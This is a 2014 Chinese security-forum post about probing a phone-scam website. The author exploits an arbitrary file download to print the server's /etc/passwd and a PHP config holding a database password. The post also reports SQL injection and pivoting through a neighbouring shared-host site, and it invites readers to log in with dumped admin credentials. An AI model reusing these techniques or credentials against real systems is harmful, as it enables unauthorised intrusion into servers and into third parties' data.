- A+
所属分类:WooYun-Zone
破落日 
| 2014-07-08 00:29
揭秘道哥的黑板报里那个骗子网站 (WOOYUN)
今晚道哥的黑板报的推送了一篇【同事亲历的一次电话诈骗】,挺有意思,没看过的同学可以看看涨姿势。
链接:点我!
里面附带了骗子的网址:http://sppcn010952110.com
那就来看看吧。
一看界面,煞有解释,应该是直接把官方的抓取过来了,但是左右两个链接异常可疑
左边的东西下载下来是一个Teamviewer。。。擦,远控啊= =,连图标也不改
仔细瞅瞅这链接:http://sppcn010952110.com/downloadfile.php?file=check.exe
果断任意文件下载:
得到一些儿信息nobody:x:99:99:Nobody:/:/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32009:32010::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:498:498:MySQL server:/var/lib/mysql:/bin/bash
sppcncom:x:837:838::/home/sppcncom:/usr/local/cpanel/bin/noshell
<?
$web_url = $_SERVER['PHP_SELF'];
$web_url = strrchr($web_url,"/");
$web_url = str_replace("/","",$web_url);
$web_domain = $_SERVER["HTTP_HOST"];
$host_url = "http://" . $web_domain;
//sppcntwd
$mysql_host_port = 'localhost:3306';
$mysql_user = 'sppcncom_a1';
$db_name = 'sppcncom_1';
$mysql_password = '2aqlpswko';
$connection = mysql_connect($mysql_host_port,$mysql_user,$mysql_password) or die("Could not connect");
$link = mysql_connect($mysql_host_port,$mysql_user,$mysql_password) or die("Could not connect");
$serverset = "character_set_connection='utf8', character_set_results='utf8', character_set_client='binary'";
mysql_query("SET $serverset");
mysql_select_db("$db_name") or die("Could not select database");
mysql_set_charset('utf8', $connection);
?>
再看看右边的,应该是查通缉令那个系统了:
随便输入个引号:
恩。。注入
然后。。然后按照常理来说是扫扫后台吧。。。
恩。。扫不到。。= =
然后就旁注吧
台湾友人的站,罪过罪过。。。
随便看了一个站,看到是蛋疼的linuxLinux sp18.g-dns.com 2.6.32-458.23.2.lve1.2.52.el6.x86_64 #1 SMP Mon Feb 3 06:07:54 EST 2014 x86_64(besttaiw)
结果找不到网站目录啊。。。估计是虚拟主机,我也懒得提权了。
最后丢了一个脚本上去看看数据库里都有啥
这目测是钓鱼钓到的?看来已经有前辈日过了吧。。
这是后台的用户密码,扫到地址的同学可以登录上去玩玩~
我就看到这儿了,大家继续吧。。。
(z7y首席代言人,园长的表哥...) 
